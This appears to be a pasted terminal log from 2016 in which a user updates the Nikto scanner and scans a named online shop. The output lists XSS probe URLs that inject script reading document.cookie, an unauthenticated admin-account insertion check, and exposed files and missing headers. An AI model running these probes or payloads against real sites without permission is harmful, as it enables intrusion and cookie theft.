
Untitled

a guest
Oct 17th, 2016
Hacker@Antares MINGW64 ~/nikto-2.1.5
$ ./nikto.pl -update
+ Retrieving 'nikto_report_csv.plugin'
+ Retrieving 'nikto_cookies.plugin'
+ Retrieving 'db_tests'
+ Retrieving 'nikto_headers.plugin'
+ Retrieving 'db_parked_strings'
+ Retrieving 'CHANGES.txt'
+ CIRT.net message: Please submit Nikto bugs to https://github.com/sullo/nikto

Hacker@Antares MINGW64 ~/nikto-2.1.5
$ ./nikto.pl -host rexant-shop.ru
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          90.156.201.84
+ Target Hostname:    rexant-shop.ru
+ Target Port:        80
+ Start Time:         2016-10-17 18:29:34 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ Server banner has changed from 'Apache' to 'nginx' which may suggest a WAF, load balancer or proxy is in place
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-59619: /inc/config.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
+ /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2820: /index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-50552: /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
+ OSVDB-25497: /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
+ OSVDB-12606: /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2790: /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3092: /news: This might be interesting...
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ Cookie 226776f356d7ecf58b60bab12a05d38f created without the httponly flag
+ Cookie 21e558d425bf38e4a2473c40a5b0b2b9 created without the httponly flag
+ 6545 items checked: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2016-10-17 18:35:16 (GMT3) (342 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested